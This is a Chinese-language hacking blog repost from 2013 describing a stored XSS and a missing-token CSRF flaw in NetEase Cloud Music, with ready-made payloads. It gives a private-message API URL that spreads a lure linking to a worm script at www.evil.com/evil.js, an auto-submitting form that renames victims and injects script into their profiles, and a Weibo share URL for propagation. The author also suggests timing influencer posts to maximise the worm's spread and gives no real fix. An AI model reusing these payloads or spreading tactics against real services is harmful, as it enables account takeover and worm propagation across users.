记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

网易云音乐存在CSRF蠕虫的危险

2013-10-19 15:00
首先使用sina进行登入,在个人简介那里写入恶意代码,如图:
 
保存,未弹窗...
 
退出,然后重新使用sina登入,弹框了,呵呵。。
 

 
本来以为就这样完了,后来在@magerx大牛的指导下,发现它没有token的,所以还可以做其他邪恶的事..
 
 
 
首先给其他的用户发带有诱惑信息的私信...
 
地址为:
http://music.163.com/api/msg/private/send?type=text&msg=尼玛这是要逆天啊,www.evil.com/evil.js&userIds=忘不了啊&time=-1
 
msg后面跟的是诱惑的内容..."忘不了啊"是接收方的名字.网址“www.evil.com/evil.js”为包含worm的恶意代码....
 
具体可以参考: 十九楼csrf可劫持用户帐号 http://www.hackdig.com/Article/201307/226262.html ,只需要替换其中的网址就可以了.
 
 
 
比如:
 
更新用户个人简介:
 

<form method="POST" action="http://music.163.com/api/user/profile/update?nickname=startz007&signature=</script><script>alert(/hack by magerx!!!/)</script>&gender=0&avatarImgId=0" name="vipcsrf" target="hidden_frame">

 

 
用户访问后用户被改为startz007和个人简介改为:
</script><script>alert(/hack by magerx/)</script>
 
要是某个名人点击了,ta就被迫改名了(当然名字没有别占用的情况下),然后你就可以占有她的名字了...
 
 
 
传播的话,除了私信,通过可以分享音乐到weibo进行传播,如下网址:
 
 
http://music.163.com/share/resource?id=5240795&msg=眼睁睁看着薛蛮子由嫖x变成弓 虽  女 干了,李天x又轮x变成嫖娼了,我却无能无力。。。唉,感觉再也不会爱。。。难道,?潘烤兔挥心嫦?哪翘炻穑勘?Χ巫忧敕梦剩 http://xxxxxxxxx.com&type=song&picUrl=&snsTypes=2
 
 
 
由于需要用户点击私信,还有网易云音乐还不是很流行,所以爆发的可能性还比较低。。
 
要是找几个大V,大概在8点20准时发出,也许效果会不会好一些 :)
 
 
 
最近发现李BB都入住网易云音乐了,牛逼啊...
 
杭州下雨了,好爽啊!还没睡的小伙伴来听听李BB的下雨,很好听的!
 
地址:http://music.163.com/#/m/song?id=26508231 

 
修复方案:

你们懂的.. 
 
知识来源: www.2cto.com/Article/201310/251128.html

阅读:93508 | 评论:0 | 标签:CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“网易云音乐存在CSRF蠕虫的危险”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云